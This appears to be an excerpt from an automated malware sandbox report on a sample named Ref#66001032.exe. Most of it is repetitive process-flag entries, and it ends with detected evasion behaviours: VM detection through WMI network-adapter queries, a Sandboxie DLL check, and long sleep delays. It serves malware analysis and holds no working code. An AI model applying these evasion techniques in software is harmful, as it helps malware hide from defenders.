                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Ref#66001032.exe PID: 2736, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: Ref#66001032.exe, 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Ref#66001032.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeMemory allocated: 4800000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2940000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4AF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Length.exeMemory allocated: 1290000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Length.exeMemory allocated: 2FB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Length.exeMemory allocated: 4FB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Users\user\Desktop\Ref#66001032.exeWindow / User API: threadDelayed 2326Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeWindow / User API: threadDelayed 7464Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 961Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1117Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Length.exeWindow / User API: threadDelayed 3141
                      Source: C:\Users\user\AppData\Roaming\Length.exeWindow / User API: threadDelayed 6687
                      Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 366
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep count: 35 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5664Thread sleep count: 2326 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5292Thread sleep count: 7464 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -99782s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -99657s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -99532s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -99422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -99313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -99188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -99063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -98938s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -98813s >= -30000sJump to behavior
